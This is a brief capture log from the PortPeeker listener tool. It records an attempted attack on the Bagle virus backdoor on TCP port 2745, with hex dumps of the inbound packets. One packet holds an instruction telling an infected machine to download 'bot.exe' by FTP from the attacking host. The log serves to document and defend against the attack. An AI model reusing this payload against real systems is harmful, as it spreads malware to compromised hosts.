PortPeeker Capture of 2745 Attack Attempt

TCP Port 2745 is a back door that was opened by a number of versions of Bagle/Beagle virus.  We captured a sample of an attack which instructed the Bagle infected system to ftp an executable from the attacking system to itself.  This is currently the most common attack method on this port.

68.8.44.240 : 4622 TCP Data In Length 24 bytes
MD5 = 46EE69DF75A57979E39CF89C71B3618E
---- 12/05/2004 03:24:22.872
0000 43 FF FF FF 30 30 30 01 0A 28 91 A1 2B E6 60 2F C...000..(..+.`/
0010 32 8F 60 15 1A 20 1A 00                         2.`.. ..

---- Data Sent
0000 47 6F 20 41 77 61 79 2E 2E Go Away..

68.8.44.240 : 4622 TCP Data In Length 40 bytes
MD5 = 6BE5C3D5EBAF87EE197CDFEA805B55B9
---- 12/05/2004 03:24:23.133
0000 66 74 70 3A 2F 2F 62 6C 61 3A 62 6C 61 40 36 38 ftp://bla:bla@68
0010 2E 38 2E 34 34 2E 32 34 30 3A 32 38 38 35 36 2F .8.44.240:28856/
0020 62 6F 74 2E 65 78 65 00                         bot.exe.

While PortPeeker is not an officially supported product if you have any suggestions or find any bugs please send them to PortPeeker@LinkLogger.com